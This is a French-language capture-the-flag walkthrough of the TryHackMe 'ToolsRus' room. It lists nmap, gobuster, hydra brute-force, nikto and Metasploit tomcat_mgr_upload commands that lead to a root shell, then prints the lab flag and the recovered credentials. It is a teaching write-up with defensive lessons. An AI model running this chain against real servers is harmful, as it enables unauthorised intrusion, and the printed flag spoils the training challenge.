CTF

TryHackMe - ToolsRus

Énumération et exploitation d'un serveur avec Nmap, Gobuster, Hydra, Nikto et Metasploit.

1 février 2026
TryHackMe
NmapGobusterHydraNiktoMetasploitTomcat

Introduction

ToolsRus est une room d'introduction aux outils de pentesting. On enchaîne énumération, brute force et exploitation pour compromettre un serveur Tomcat.

Outils utilisés : Nmap, Gobuster, Hydra, Nikto, Metasploit


Reconnaissance

Scan Nmap

nmap -sC -sV <IP>

Résultats Nmap
Résultats Nmap

Services découverts :

PortServiceVersion
22SSHOpenSSH
80HTTPApache
1234HTTPApache Tomcat/Coyote JSP engine 1.1

Énumération Web

Gobuster

gobuster dir -u http:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Résultats Gobuster
Résultats Gobuster

Répertoires découverts :

  • /guidelines → Contient un nom d'utilisateur
  • /protected → Authentification basique requise

En visitant /guidelines, on trouve un nom : bob.


Brute Force avec Hydra

Le répertoire /protected demande une authentification. On utilise Hydra avec l'utilisateur bob :

hydra -l bob -P /usr/share/wordlists/rockyou.txt <IP> http-get /protected

Hydra trouve le mot de passe
Hydra trouve le mot de passe

Credentials : bob:bubbles


Énumération Tomcat

Le port 1234 héberge un serveur Tomcat. On scanne avec Nikto en utilisant les credentials trouvés :

nikto -h http://:1234/manager/html -id bob:bubbles

Résultats Nikto
Résultats Nikto

Informations obtenues :

  • Tomcat Manager accessible
  • Version Apache-Coyote : 1.1
  • Plusieurs vulnérabilités potentielles

Exploitation avec Metasploit

Tomcat Manager permet d'uploader des fichiers WAR. On exploite cette fonctionnalité :

msfconsole
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <IP>
set RPORT 1234
set HttpUsername bob
set HttpPassword bubbles
exploit

On obtient un shell avec les privilèges root.


Flag

cat /root/flag.txt

Flag
Flag

Flag : ff1fc4a81affcc7688cf89ae7dc6e0e1


Résumé de l'attaque

ÉtapeOutilRésultat
Scan portsNmapPorts 22, 80, 1234
Enum directoriesGobuster/guidelines, /protected
Brute forceHydrabob:bubbles
Scan vulnsNiktoTomcat Manager exposé
ExploitationMetasploitShell root

Mapping MITRE ATT&CK

TechniqueIDObservation
Network Service DiscoveryT1046Scan Nmap
Brute ForceT1110Hydra sur /protected
Valid AccountsT1078Credentials bob:bubbles
Exploit Public-Facing ApplicationT1190Tomcat Manager upload

Leçons apprises

  1. Restreindre l'accès à Tomcat Manager par IP ou VPN
  2. Mots de passe faibles = compromission garantie
  3. Énumération est la clé avant toute exploitation
  4. Séparer les credentials entre les services

Pratiquer sur CyberPath